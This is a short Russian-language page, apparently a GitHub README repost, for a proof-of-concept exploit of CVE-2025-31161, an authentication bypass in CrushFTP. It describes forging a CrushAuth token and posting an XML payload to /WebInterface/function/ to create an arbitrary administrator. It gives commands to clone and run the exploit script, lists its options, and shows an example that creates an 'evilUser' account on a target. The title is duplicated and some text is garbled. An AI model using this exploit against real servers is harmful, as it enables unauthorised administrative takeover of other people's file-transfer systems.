
PoC CVE-2025-31161 - Обход аутентификации CrushFTP
PoC CVE-2025-31161 - Обход аутентификации CrushFTP
CrushAuth и создать полностью привилегированную учётную запись администратора.Этот эксплойт нацелен на критическую уязвимость в CrushFTP, позволяющую удалённым неаутентифицированным злоумышленникам обойти аутентификацию и создать произвольных администраторов.
Работает путём изготовления валидного токена CrushAuth и злоупотребления конечной точкой /WebInterface/function/ для отправки полностью сформированной XML-нагрузки.
curlshufgit clone https://github.com/f4dee-backup/CVE-2025-31161
cd CVE-2025-31161
chmod +x CVE-2025-31161.sh
./CVE-2025-31161.sh --help
[?] Описание параметров:
--url Базовый URL цели (например, http://target)
--port Порт, на котором запущен CrushFTP
--target-user Действительное или недействительное имя пользователя (например, crushadmin)
--new-user Имя пользователя для создания (например, Pwn3d)
--new-password Пароль для нового пользователя
--help Показать эту панель помощи
[i] Пример: ./CVE-2025-31161.sh --url http://target.com --port 80 --target-user crushadmin --new-user evilUser --new-password pass12345